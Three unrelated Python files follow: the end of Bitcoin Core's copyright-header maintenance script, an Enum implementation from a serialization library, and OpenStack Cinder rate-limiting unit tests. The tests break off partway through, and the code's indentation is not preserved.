print(SEPARATOR)
print('Copyrights with year list style:\ne.g. "Copyright (c)" and '
'"<year1>, <year2>, ...":\n')
for holder_name in EXPECTED_HOLDER_NAMES:
year_list_style = [i['filename'] for i in file_infos if
i['year_list_style'][holder_name]]
if len(year_list_style) > 0:
print("%4d with '%s'" % (len(year_list_style),
holder_name.replace('\n', '\\n')))
print_filenames(year_list_style, verbose)
print('')
print(SEPARATOR)
print('Copyrights with no "(c)" style:\ne.g. "Copyright" and "<year>" or '
'"<startYear>-<endYear>":\n')
for holder_name in EXPECTED_HOLDER_NAMES:
without_c_style = [i['filename'] for i in file_infos if
i['without_c_style'][holder_name]]
if len(without_c_style) > 0:
print("%4d with '%s'" % (len(without_c_style),
holder_name.replace('\n', '\\n')))
print_filenames(without_c_style, verbose)
print('')
print(SEPARATOR)
unclassified_copyrights = [i['filename'] for i in file_infos if
i['classified_copyrights'] < i['all_copyrights']]
print("%d with unexpected copyright holder names" %
len(unclassified_copyrights))
print_filenames(unclassified_copyrights, verbose)
print(SEPARATOR)
def exec_report(base_directory, verbose):
original_cwd = os.getcwd()
os.chdir(base_directory)
filenames = get_filenames_to_examine()
file_infos = [gather_file_info(f) for f in filenames]
print_report(file_infos, verbose)
os.chdir(original_cwd)
################################################################################
# report cmd
################################################################################
REPORT_USAGE = """
Produces a report of all copyright header notices found inside the source files
of a repository.
Usage:
$ ./copyright_header.py report <base_directory> [verbose]
Arguments:
<base_directory> - The base directory of a bitcoin source code repository.
[verbose] - Includes a list of every file of each subcategory in the report.
"""
def report_cmd(argv):
if len(argv) == 2:
sys.exit(REPORT_USAGE)
base_directory = argv[2]
if not os.path.exists(base_directory):
sys.exit("*** bad <base_directory>: %s" % base_directory)
if len(argv) == 3:
verbose = False
elif argv[3] == 'verbose':
verbose = True
else:
sys.exit("*** unknown argument: %s" % argv[2])
exec_report(base_directory, verbose)
################################################################################
# query git for year of last change
################################################################################
GIT_LOG_CMD = "git log --pretty=format:%%ai %s"
def call_git_log(filename):
out = subprocess.check_output((GIT_LOG_CMD % filename).split(' '))
return out.decode("utf-8").split('\n')
def get_git_change_years(filename):
git_log_lines = call_git_log(filename)
if len(git_log_lines) == 0:
return [datetime.date.today().year]
# timestamp is in ISO 8601 format. e.g. "2016-09-05 14:25:32 -0600"
return [line.split(' ')[0].split('-')[0] for line in git_log_lines]
def get_most_recent_git_change_year(filename):
return max(get_git_change_years(filename))
################################################################################
# read and write to file
################################################################################
def read_file_lines(filename):
f = open(os.path.abspath(filename), 'r')
file_lines = f.readlines()
f.close()
return file_lines
def write_file_lines(filename, file_lines):
f = open(os.path.abspath(filename), 'w')
f.write(''.join(file_lines))
f.close()
################################################################################
# update header years execution
################################################################################
COPYRIGHT = 'Copyright \(c\)'
YEAR = "20[0-9][0-9]"
YEAR_RANGE = '(%s)(-%s)?' % (YEAR, YEAR)
HOLDER = 'The Bitcoin Core developers'
UPDATEABLE_LINE_COMPILED = re.compile(' '.join([COPYRIGHT, YEAR_RANGE, HOLDER]))
def get_updatable_copyright_line(file_lines):
index = 0
for line in file_lines:
if UPDATEABLE_LINE_COMPILED.search(line) is not None:
return index, line
index = index + 1
return None, None
def parse_year_range(year_range):
year_split = year_range.split('-')
start_year = year_split[0]
if len(year_split) == 1:
return start_year, start_year
return start_year, year_split[1]
def year_range_to_str(start_year, end_year):
if start_year == end_year:
return start_year
return "%s-%s" % (start_year, end_year)
def create_updated_copyright_line(line, last_git_change_year):
copyright_splitter = 'Copyright (c) '
copyright_split = line.split(copyright_splitter)
# Preserve characters on line that are ahead of the start of the copyright
# notice - they are part of the comment block and vary from file-to-file.
before_copyright = copyright_split[0]
after_copyright = copyright_split[1]
space_split = after_copyright.split(' ')
year_range = space_split[0]
start_year, end_year = parse_year_range(year_range)
if end_year == last_git_change_year:
return line
return (before_copyright + copyright_splitter +
year_range_to_str(start_year, last_git_change_year) + ' ' +
' '.join(space_split[1:]))
def update_updatable_copyright(filename):
file_lines = read_file_lines(filename)
index, line = get_updatable_copyright_line(file_lines)
if not line:
print_file_action_message(filename, "No updatable copyright.")
return
last_git_change_year = get_most_recent_git_change_year(filename)
new_line = create_updated_copyright_line(line, last_git_change_year)
if line == new_line:
print_file_action_message(filename, "Copyright up-to-date.")
return
file_lines[index] = new_line
write_file_lines(filename, file_lines)
print_file_action_message(filename,
"Copyright updated! -> %s" % last_git_change_year)
def exec_update_header_year(base_directory):
original_cwd = os.getcwd()
os.chdir(base_directory)
for filename in get_filenames_to_examine():
update_updatable_copyright(filename)
os.chdir(original_cwd)
################################################################################
# update cmd
################################################################################
UPDATE_USAGE = """
Updates all the copyright headers of "The Bitcoin Core developers" which were
changed in a year more recent than is listed. For example:
// Copyright (c) <firstYear>-<lastYear> The Bitcoin Core developers
will be updated to:
// Copyright (c) <firstYear>-<lastModifiedYear> The Bitcoin Core developers
where <lastModifiedYear> is obtained from the 'git log' history.
This subcommand also handles copyright headers that have only a single year. In those cases:
// Copyright (c) <year> The Bitcoin Core developers
will be updated to:
// Copyright (c) <year>-<lastModifiedYear> The Bitcoin Core developers
where the update is appropriate.
Usage:
$ ./copyright_header.py update <base_directory>
Arguments:
<base_directory> - The base directory of a bitcoin source code repository.
"""
def print_file_action_message(filename, action):
print("%-52s %s" % (filename, action))
def update_cmd(argv):
if len(argv) != 3:
sys.exit(UPDATE_USAGE)
base_directory = argv[2]
if not os.path.exists(base_directory):
sys.exit("*** bad base_directory: %s" % base_directory)
exec_update_header_year(base_directory)
################################################################################
# inserted copyright header format
################################################################################
def get_header_lines(header, start_year, end_year):
lines = header.split('\n')[1:-1]
lines[0] = lines[0] % year_range_to_str(start_year, end_year)
return [line + '\n' for line in lines]
CPP_HEADER = '''
// Copyright (c) %s The Bitcoin Core developers
// Distributed under the MIT software license, see the accompanying
// file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
def get_cpp_header_lines_to_insert(start_year, end_year):
return reversed(get_header_lines(CPP_HEADER, start_year, end_year))
PYTHON_HEADER = '''
# Copyright (c) %s The Bitcoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
'''
def get_python_header_lines_to_insert(start_year, end_year):
return reversed(get_header_lines(PYTHON_HEADER, start_year, end_year))
################################################################################
# query git for year of last change
################################################################################
def get_git_change_year_range(filename):
years = get_git_change_years(filename)
return min(years), max(years)
################################################################################
# check for existing core copyright
################################################################################
def file_already_has_core_copyright(file_lines):
index, _ = get_updatable_copyright_line(file_lines)
return index != None
################################################################################
# insert header execution
################################################################################
def file_has_hashbang(file_lines):
if len(file_lines) < 1:
return False
if len(file_lines[0]) <= 2:
return False
return file_lines[0][:2] == '#!'
def insert_python_header(filename, file_lines, start_year, end_year):
if file_has_hashbang(file_lines):
insert_idx = 1
else:
insert_idx = 0
header_lines = get_python_header_lines_to_insert(start_year, end_year)
for line in header_lines:
file_lines.insert(insert_idx, line)
write_file_lines(filename, file_lines)
def insert_cpp_header(filename, file_lines, start_year, end_year):
header_lines = get_cpp_header_lines_to_insert(start_year, end_year)
for line in header_lines:
file_lines.insert(0, line)
write_file_lines(filename, file_lines)
def exec_insert_header(filename, style):
file_lines = read_file_lines(filename)
if file_already_has_core_copyright(file_lines):
sys.exit('*** %s already has a copyright by The Bitcoin Core developers'
% (filename))
start_year, end_year = get_git_change_year_range(filename)
if style == 'python':
insert_python_header(filename, file_lines, start_year, end_year)
else:
insert_cpp_header(filename, file_lines, start_year, end_year)
################################################################################
# insert cmd
################################################################################
INSERT_USAGE = """
Inserts a copyright header for "The Bitcoin Core developers" at the top of the
file in either Python or C++ style as determined by the file extension. If the
file is a Python file and it has a '#!' starting the first line, the header is
inserted in the line below it.
The copyright dates will be set to be:
"<year_introduced>-<current_year>"
where <year_introduced> is according to the 'git log' history. If
<year_introduced> is equal to <current_year>, the date will be set to be:
"<current_year>"
If the file already has a copyright for "The Bitcoin Core developers", the
script will exit.
Usage:
$ ./copyright_header.py insert <file>
Arguments:
<file> - A source file in the bitcoin repository.
"""
def insert_cmd(argv):
if len(argv) != 3:
sys.exit(INSERT_USAGE)
filename = argv[2]
if not os.path.isfile(filename):
sys.exit("*** bad filename: %s" % filename)
_, extension = os.path.splitext(filename)
if extension not in ['.h', '.cpp', '.cc', '.c', '.py']:
sys.exit("*** cannot insert for file extension %s" % extension)
if extension == '.py':
style = 'python'
else:
style = 'cpp'
exec_insert_header(filename, style)
################################################################################
# UI
################################################################################
USAGE = """
copyright_header.py - utilities for managing copyright headers of 'The Bitcoin
Core developers' in repository source files.
Usage:
$ ./copyright_header <subcommand>
Subcommands:
report
update
insert
To see subcommand usage, run them without arguments.
"""
SUBCOMMANDS = ['report', 'update', 'insert']
if __name__ == "__main__":
if len(sys.argv) == 1:
sys.exit(USAGE)
subcommand = sys.argv[1]
if subcommand not in SUBCOMMANDS:
sys.exit(USAGE)
if subcommand == 'report':
report_cmd(sys.argv)
elif subcommand == 'update':
update_cmd(sys.argv)
elif subcommand == 'insert':
insert_cmd(sys.argv)
|
|
"""
:file: enum.py
Contains a more natural enum implementation.
:date: 10/06/2016
:authors:
- Gilad Naaman <gilad@naaman.io>
"""
from .base import *
from .scalars import *
import collections
__all__ = ('Enum', 'auto')
class auto:
# This is implemented solely to satisfy PyCharm's type-checker.
# In reality this function will never be called
def __int__(self):
raise RuntimeError('This is not supposed to happen')
class Literal:
def __init__(self, enum_type, literal_name, value):
self.enum = enum_type
self.literal_name = literal_name
self.value = value
def __int__(self):
return self.value
def __repr__(self):
return f'{get_type_name(self.enum)}.{self.literal_name}'
def __eq__(self, other):
return int(self) == int(other)
def __hash__(self):
return hash((self.enum, self.literal_name, self.value))
class EnumMetadata(SerializerMetadata):
__slots__ = ('flags', 'serializer', 'literals', 'reverse_map')
_VALID_UNDERLYING_TYPES = (
u8, u16, u32, u64, i8, i16, i32, i64,
u8_le, u16_le, u32_le, u64_le, i8_le, i16_le, i32_le, i64_le,
u8_be, u16_be, u32_be, u64_be, i8_be, i16_be, i32_be, i64_be)
def __init__(self, *,
literals: collections.OrderedDict,
reverse_map: Dict,
underlying: Type['Scalar'],
flags: bool = False):
super().__init__(underlying.byte_size)
if underlying not in self._VALID_UNDERLYING_TYPES:
raise TypeError(f'Invalid underlying type for Enum: {get_type_name(underlying)}')
serializer = get_as_value(underlying)
try:
for k, v in literals.items():
serializer.validate(v)
except ValueError as e:
raise ValueError(f'Invalid value for literal {v}: {e}')
self.flags = flags
self.serializer = serializer
self.literals = literals
self.reverse_map = reverse_map
class EnumMeta(SerializerMeta):
_hydras_metadata: EnumMetadata
def __new__(mcs, name, bases, classdict: collections.OrderedDict, underlying_type=i32):
if not hasattr(mcs, SerializerMeta.METAATTR):
literals = (
(k, v) for k, v in classdict.items()
if isinstance(v, (int, auto)) and not k.startswith('_')
)
literals_dict = collections.OrderedDict()
next_expected_value = 0
for lit_name, literal in literals:
# Replace `auto` instances with the correct values.
if isinstance(literal, auto):
# Update the literal object before taking its value
literal = next_expected_value
classdict[lit_name] = literal
next_expected_value = literal + 1
literals_dict[lit_name] = literal
for lit_name in literals_dict:
del classdict[lit_name]
reverse_map = {
value: Literal(mcs, name, value)
for name, value in literals_dict.items()
}
metadata = EnumMetadata(literals=literals_dict, reverse_map=reverse_map, underlying=underlying_type)
classdict.update({SerializerMeta.METAATTR: metadata})
# Patch the actual enum type once we get it from super.
gen_mcs = super(EnumMeta, mcs).__new__(mcs, name, bases, classdict)
for lit in reverse_map.values():
lit.enum = gen_mcs
return gen_mcs
return super(EnumMeta, mcs).__new__(mcs, name, bases, classdict)
def __prepare__(cls, bases, **kwargs):
return collections.OrderedDict()
def __contains__(cls, item):
if isinstance(item, Literal):
return item.enum == cls and cls.literals.get(item.literal_name) == item.value
elif isinstance(item, int):
return item in cls.literals.values()
return False
@property
def literals(cls) -> collections.OrderedDict:
return cls._hydras_metadata.literals
def __getattr__(cls, name):
# Wrap literals in a `Literal` object
if name in cls._hydras_metadata.literals:
return Literal(cls, name, cls._hydras_metadata.literals[name])
return super().__getattr__(name)
def __repr__(cls):
return get_type_name(cls)
class Enum(Serializer, metaclass=EnumMeta):
__slots__ = ()
_hydras_metadata: EnumMetadata
""" An enum formatter that can be shared between structs. """
def __init__(self, default_value=None, *args, **kwargs):
if type(self) is Enum:
raise RuntimeError('Cannot instantiate `Enum` directly. Must subclass it.')
elif len(self._hydras_metadata.literals) == 0:
raise RuntimeError('Cannot instantiate an empty Enum')
assert default_value is None or isinstance(default_value, (int, Literal))
# Validate the default_value
if default_value is None:
default_value = self.get_literal_by_name(next(iter(self._hydras_metadata.literals)))
elif isinstance(default_value, int):
if not self.is_constant_valid(default_value):
raise ValueError('Literal constant is not included in the enum: %d' % default_value)
default_value = self.get_literal_by_value(default_value)
elif isinstance(default_value, Literal):
if default_value.enum is not type(self) or \
not self.is_constant_valid(default_value.value) or \
default_value.literal_name not in self._hydras_metadata.literals:
raise ValueError('Invalid or corrupted literal')
super(Enum, self).__init__(default_value, *args, **kwargs)
def serialize_into(self, storage: memoryview, offset: int, value: Literal, settings: HydraSettings = None) -> int:
assert (isinstance(value, Literal) and value.enum == type(self)) or \
(isinstance(value, int) and self.is_constant_valid(value))
return self._hydras_metadata.serializer.serialize_into(storage, offset, int(value), settings)
def deserialize(self, raw_data, settings: HydraSettings = None):
value = self._hydras_metadata.serializer.deserialize(raw_data, settings)
lit = self._hydras_metadata.reverse_map[value]
if lit is None:
raise ValueError('Parsed enum value is unknown: %d' % value)
return lit
def validate(self, value):
""" Validate the given enum value. """
if not self.is_constant_valid(int(value)):
return ValueError('Enum literal value is not part of the enum')
super(Enum, self).validate(int(value))
def is_constant_valid(self, num):
""" Determine if the given number is a valid enum literal. """
return num in self._hydras_metadata.reverse_map
@classmethod
def get_literal_name(cls, num):
""" Get the name of the constant from a number or a Literal object. """
lit = cls._hydras_metadata.reverse_map.get(num)
if lit is not None:
return lit.literal_name
return None
@classmethod
def get_literal_by_name(cls, name):
return Literal(cls, name, cls._hydras_metadata.literals[name])
@classmethod
def get_literal_by_value(cls, value):
return cls._hydras_metadata.reverse_map.get(value)
def values_equal(self, a, b):
return int(a) == int(b)
def __repr__(self):
value = self.get_initial_value()
if value.literal_name == next(iter(self._hydras_metadata.literals.keys())):
value = ''
return f'{get_type_name(self)}({value})'
|
|
# Copyright 2011 OpenStack Foundation
# All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
"""
Tests dealing with HTTP rate-limiting.
"""
import httplib
from xml.dom import minidom
from lxml import etree
import six
import webob
from cinder.api.v2 import limits
from cinder.api import views
from cinder.api import xmlutil
import cinder.context
from cinder.openstack.common import jsonutils
from cinder import test
TEST_LIMITS = [
limits.Limit("GET", "/delayed", "^/delayed", 1, limits.PER_MINUTE),
limits.Limit("POST", "*", ".*", 7, limits.PER_MINUTE),
limits.Limit("POST", "/volumes", "^/volumes", 3, limits.PER_MINUTE),
limits.Limit("PUT", "*", "", 10, limits.PER_MINUTE),
limits.Limit("PUT", "/volumes", "^/volumes", 5, limits.PER_MINUTE),
]
NS = {
'atom': 'http://www.w3.org/2005/Atom',
'ns': 'http://docs.openstack.org/common/api/v1.0',
}
class BaseLimitTestSuite(test.TestCase):
"""Base test suite which provides relevant stubs and time abstraction."""
def setUp(self):
super(BaseLimitTestSuite, self).setUp()
self.time = 0.0
self.stubs.Set(limits.Limit, "_get_time", self._get_time)
self.absolute_limits = {}
def stub_get_project_quotas(context, project_id, usages=True):
return dict((k, dict(limit=v))
for k, v in self.absolute_limits.items())
self.stubs.Set(cinder.quota.QUOTAS, "get_project_quotas",
stub_get_project_quotas)
def _get_time(self):
"""Return the "time" according to this test suite."""
return self.time
class LimitsControllerTest(BaseLimitTestSuite):
"""Tests for `limits.LimitsController` class."""
def setUp(self):
"""Run before each test."""
super(LimitsControllerTest, self).setUp()
self.controller = limits.create_resource()
def _get_index_request(self, accept_header="application/json"):
"""Helper to set routing arguments."""
request = webob.Request.blank("/")
request.accept = accept_header
request.environ["wsgiorg.routing_args"] = (None, {
"action": "index",
"controller": "",
})
context = cinder.context.RequestContext('testuser', 'testproject')
request.environ["cinder.context"] = context
return request
def _populate_limits(self, request):
"""Put limit info into a request."""
_limits = [
limits.Limit("GET", "*", ".*", 10, 60).display(),
limits.Limit("POST", "*", ".*", 5, 60 * 60).display(),
limits.Limit("GET", "changes-since*", "changes-since",
5, 60).display(),
]
request.environ["cinder.limits"] = _limits
return request
def test_empty_index_json(self):
"""Test getting empty limit details in JSON."""
request = self._get_index_request()
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [],
"absolute": {},
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def test_index_json(self):
"""Test getting limit details in JSON."""
request = self._get_index_request()
request = self._populate_limits(request)
self.absolute_limits = {
'gigabytes': 512,
'volumes': 5,
}
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [
{
"regex": ".*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00Z",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
{
"verb": "POST",
"next-available": "1970-01-01T00:00:00Z",
"unit": "HOUR",
"value": 5,
"remaining": 5,
},
],
},
{
"regex": "changes-since",
"uri": "changes-since*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00Z",
"unit": "MINUTE",
"value": 5,
"remaining": 5,
},
],
},
],
"absolute": {"maxTotalVolumeGigabytes": 512,
"maxTotalVolumes": 5, },
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def _populate_limits_diff_regex(self, request):
"""Put limit info into a request."""
_limits = [
limits.Limit("GET", "*", ".*", 10, 60).display(),
limits.Limit("GET", "*", "*.*", 10, 60).display(),
]
request.environ["cinder.limits"] = _limits
return request
def test_index_diff_regex(self):
"""Test getting limit details in JSON."""
request = self._get_index_request()
request = self._populate_limits_diff_regex(request)
response = request.get_response(self.controller)
expected = {
"limits": {
"rate": [
{
"regex": ".*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00Z",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
],
},
{
"regex": "*.*",
"uri": "*",
"limit": [
{
"verb": "GET",
"next-available": "1970-01-01T00:00:00Z",
"unit": "MINUTE",
"value": 10,
"remaining": 10,
},
],
},
],
"absolute": {},
},
}
body = jsonutils.loads(response.body)
self.assertEqual(expected, body)
def _test_index_absolute_limits_json(self, expected):
request = self._get_index_request()
response = request.get_response(self.controller)
body = jsonutils.loads(response.body)
self.assertEqual(expected, body['limits']['absolute'])
def test_index_ignores_extra_absolute_limits_json(self):
self.absolute_limits = {'unknown_limit': 9001}
self._test_index_absolute_limits_json({})
class TestLimiter(limits.Limiter):
pass
class LimitMiddlewareTest(BaseLimitTestSuite):
"""Tests for the `limits.RateLimitingMiddleware` class."""
@webob.dec.wsgify
def _empty_app(self, request):
"""Do-nothing WSGI app."""
pass
def setUp(self):
"""Prepare middleware for use through fake WSGI app."""
super(LimitMiddlewareTest, self).setUp()
_limits = '(GET, *, .*, 1, MINUTE)'
self.app = limits.RateLimitingMiddleware(self._empty_app, _limits,
"%s.TestLimiter" %
self.__class__.__module__)
def test_limit_class(self):
"""Test that middleware selected correct limiter class."""
assert isinstance(self.app._limiter, TestLimiter)
def test_good_request(self):
"""Test successful GET request through middleware."""
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(200, response.status_int)
def test_limited_request_json(self):
"""Test a rate-limited (413) GET request through middleware."""
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(200, response.status_int)
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(response.status_int, 413)
self.assertIn('Retry-After', response.headers)
retry_after = int(response.headers['Retry-After'])
self.assertAlmostEqual(retry_after, 60, 1)
body = jsonutils.loads(response.body)
expected = "Only 1 GET request(s) can be made to * every minute."
value = body["overLimitFault"]["details"].strip()
self.assertEqual(value, expected)
def test_limited_request_xml(self):
"""Test a rate-limited (413) response as XML."""
request = webob.Request.blank("/")
response = request.get_response(self.app)
self.assertEqual(200, response.status_int)
request = webob.Request.blank("/")
request.accept = "application/xml"
response = request.get_response(self.app)
self.assertEqual(response.status_int, 413)
root = minidom.parseString(response.body).childNodes[0]
expected = "Only 1 GET request(s) can be made to * every minute."
details = root.getElementsByTagName("details")
self.assertEqual(details.length, 1)
value = details.item(0).firstChild.data.strip()
self.assertEqual(value, expected)
class LimitTest(BaseLimitTestSuite):
"""Tests for the `limits.Limit` class."""
def test_GET_no_delay(self):
"""Test a limit handles 1 GET per second."""
limit = limits.Limit("GET", "*", ".*", 1, 1)
delay = limit("GET", "/anything")
self.assertIsNone(delay)
self.assertEqual(0, limit.next_request)
self.assertEqual(0, limit.last_request)
def test_GET_delay(self):
"""Test two calls to 1 GET per second limit."""
limit = limits.Limit("GET", "*", ".*", 1, 1)
delay = limit("GET", "/anything")
self.assertIsNone(delay)
delay = limit("GET", "/anything")
self.assertEqual(1, delay)
self.assertEqual(1, limit.next_request)
self.assertEqual(0, limit.last_request)
self.time += 4
delay = limit("GET", "/anything")
self.assertIsNone(delay)
self.assertEqual(4, limit.next_request)
self.assertEqual(4, limit.last_request)
class ParseLimitsTest(BaseLimitTestSuite):
"""Tests for the default limits parser in the `limits.Limiter` class."""
def test_invalid(self):
"""Test that parse_limits() handles invalid input correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
';;;;;')
def test_bad_rule(self):
"""Test that parse_limits() handles bad rules correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'GET, *, .*, 20, minute')
def test_missing_arg(self):
"""Test that parse_limits() handles missing args correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, 20)')
def test_bad_value(self):
"""Test that parse_limits() handles bad values correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, foo, minute)')
def test_bad_unit(self):
"""Test that parse_limits() handles bad units correctly."""
self.assertRaises(ValueError, limits.Limiter.parse_limits,
'(GET, *, .*, 20, lightyears)')
def test_multiple_rules(self):
"""Test that parse_limits() handles multiple rules correctly."""
try:
l = limits.Limiter.parse_limits('(get, *, .*, 20, minute);'
'(PUT, /foo*, /foo.*, 10, hour);'
'(POST, /bar*, /bar.*, 5, second);'
'(Say, /derp*, /derp.*, 1, day)')
except ValueError as e:
assert False, str(e)
# Make sure the number of returned limits are correct
self.assertEqual(len(l), 4)
# Check all the verbs...
expected = ['GET', 'PUT', 'POST', 'SAY']
self.assertEqual([t.verb for t in l], expected)
# ...the URIs...
expected = ['*', '/foo*', '/bar*', '/derp*']
self.assertEqual([t.uri for t in l], expected)
# ...the regexes...
expected = ['.*', '/foo.*', '/bar.*', '/derp.*']
self.assertEqual([t.regex for t in l], expected)
# ...the values...
expected = [20, 10, 5, 1]
self.assertEqual([t.value for t in l], expected)
# ...and the units...
expected = [limits.PER_MINUTE, limits.PER_HOUR,
limits.PER_SECOND, limits.PER_DAY]
self.assertEqual([t.unit for t in l], expected)
class LimiterTest(BaseLimitTestSuite):
"""Tests for the in-memory `limits.Limiter` class."""
def setUp(self):
"""Run before each test."""
super(LimiterTest, self).setUp()
userlimits = {'limits.user3': '',
'limits.user0': '(get, *, .*, 4, minute);'
'(put, *, .*, 2, minute)'}
self.limiter = limits.Limiter(TEST_LIMITS, **userlimits)
def _check(self, num, verb, url, username=None):
"""Check and yield results from checks."""
for x in xrange(num):
yield self.limiter.check_for_delay(verb, url, username)[0]
def _check_sum(self, num, verb, url, username=None):
"""Check and sum results from checks."""
results = self._check(num, verb, url, username)
return sum(item for item in results if item)
def test_no_delay_GET(self):
"""Ensure no delay on a single call for a limit verb we didn't set."""
delay = self.limiter.check_for_delay("GET", "/anything")
self.assertEqual(delay, (None, None))
def test_no_delay_PUT(self):
"""Ensure no delay on a single call for a known limit."""
delay = self.limiter.check_for_delay("PUT", "/anything")
self.assertEqual(delay, (None, None))
def test_delay_PUT(self):
"""Test delay on 11th PUT request.
Ensure the 11th PUT will result in a delay of 6.0 seconds until
the next request will be granced.
"""
expected = [None] * 10 + [6.0]
results = list(self._check(11, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_delay_POST(self):
"""Test delay on 8th POST request.
Ensure the 8th POST will result in a delay of 6.0 seconds until
the next request will be granced.
"""
expected = [None] * 7
results = list(self._check(7, "POST", "/anything"))
self.assertEqual(expected, results)
expected = 60.0 / 7.0
results = self._check_sum(1, "POST", "/anything")
self.assertAlmostEqual(expected, results, 8)
def test_delay_GET(self):
"""Ensure the 11th GET will result in NO delay."""
expected = [None] * 11
results = list(self._check(11, "GET", "/anything"))
self.assertEqual(expected, results)
expected = [None] * 4 + [15.0]
results = list(self._check(5, "GET", "/foo", "user0"))
self.assertEqual(expected, results)
def test_delay_PUT_volumes(self):
"""Test delay on /volumes.
Ensure PUT on /volumes limits at 5 requests, and PUT elsewhere
is still OK after 5 requests...but then after 11 total requests,
PUT limiting kicks in.
"""
# First 6 requests on PUT /volumes
expected = [None] * 5 + [12.0]
results = list(self._check(6, "PUT", "/volumes"))
self.assertEqual(expected, results)
# Next 5 request on PUT /anything
expected = [None] * 4 + [6.0]
results = list(self._check(5, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_delay_PUT_wait(self):
"""Test limit is lifted again.
Ensure after hitting the limit and then waiting for
the correct amount of time, the limit will be lifted.
"""
expected = [None] * 10 + [6.0]
results = list(self._check(11, "PUT", "/anything"))
self.assertEqual(expected, results)
# Advance time
self.time += 6.0
expected = [None, 6.0]
results = list(self._check(2, "PUT", "/anything"))
self.assertEqual(expected, results)
def test_multiple_delays(self):
"""Ensure multiple requests still get a delay."""
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything"))
self.assertEqual(expected, results)
self.time += 1.0
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything"))
self.assertEqual(expected, results)
expected = [None] * 2 + [30.0] * 8
results = list(self._check(10, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
def test_user_limit(self):
"""Test user-specific limits."""
self.assertEqual(self.limiter.levels['user3'], [])
self.assertEqual(len(self.limiter.levels['user0']), 2)
def test_multiple_users(self):
"""Tests involving multiple users."""
# User0
expected = [None] * 2 + [30.0] * 8
results = list(self._check(10, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
# User1
expected = [None] * 10 + [6.0] * 10
results = list(self._check(20, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
# User2
expected = [None] * 10 + [6.0] * 5
results = list(self._check(15, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
# User3
expected = [None] * 20
results = list(self._check(20, "PUT", "/anything", "user3"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [5.0] * 10
results = list(self._check(10, "PUT", "/anything", "user1"))
self.assertEqual(expected, results)
self.time += 1.0
# User1 again
expected = [4.0] * 5
results = list(self._check(5, "PUT", "/anything", "user2"))
self.assertEqual(expected, results)
# User0 again
expected = [28.0]
results = list(self._check(1, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
self.time += 28.0
expected = [None, 30.0]
results = list(self._check(2, "PUT", "/anything", "user0"))
self.assertEqual(expected, results)
class WsgiLimiterTest(BaseLimitTestSuite):
"""Tests for `limits.WsgiLimiter` class."""
def setUp(self):
"""Run before each test."""
super(WsgiLimiterTest, self).setUp()
self.app = limits.WsgiLimiter(TEST_LIMITS)
def _request_data(self, verb, path):
"""Get data describing a limit request verb/path."""
return jsonutils.dumps({"verb": verb, "path": path})
def _request(self, verb, url, username=None):
"""Make sure that POSTing to the given url causes the given username
to perform the given action. Make the internal rate limiter return
delay and make sure that the WSGI app returns the correct response.
"""
if username:
request = webob.Request.blank("/%s" % username)
else:
request = webob.Request.blank("/")
request.method = "POST"
request.body = self._request_data(verb, url)
response = request.get_response(self.app)
if "X-Wait-Seconds" in response.headers:
self.assertEqual(response.status_int, 403)
return response.headers["X-Wait-Seconds"]
self.assertEqual(response.status_int, 204)
def test_invalid_methods(self):
"""Only POSTs should work."""
for method in ["GET", "PUT", "DELETE", "HEAD", "OPTIONS"]:
request = webob.Request.blank("/", method=method)
response = request.get_response(self.app)
self.assertEqual(response.status_int, 405)
def test_good_url(self):
delay = self._request("GET", "/something")
self.assertIsNone(delay)
def test_escaping(self):
delay = self._request("GET", "/something/jump%20up")
self.assertIsNone(delay)
def test_response_to_delays(self):
delay = self._request("GET", "/delayed")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed")
self.assertEqual(delay, '60.00')
def test_response_to_delays_usernames(self):
delay = self._request("GET", "/delayed", "user1")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed", "user2")
self.assertIsNone(delay)
delay = self._request("GET", "/delayed", "user1")
self.assertEqual(delay, '60.00')
delay = self._request("GET", "/delayed", "user2")
self.assertEqual(delay, '60.00')
class FakeHttplibSocket(object):
"""Fake `httplib.HTTPResponse` replacement."""
def __init__(self, response_string):
"""Initialize new `FakeHttplibSocket`."""
self._buffer = six.StringIO(response_string)
def makefile(self, _mode, _other):
"""Returns the socket's internal buffer."""
return self._buffer
class FakeHttplibConnection(object):
"""Fake `httplib.HTTPConnection`."""
def __init__(self, app, host):
"""Initialize `FakeHttplibConnection`."""
self.app = app
self.host = host
def request(self, method, path, body="", headers=None):
"""Fake request handler.
Requests made via this connection actually get translated and
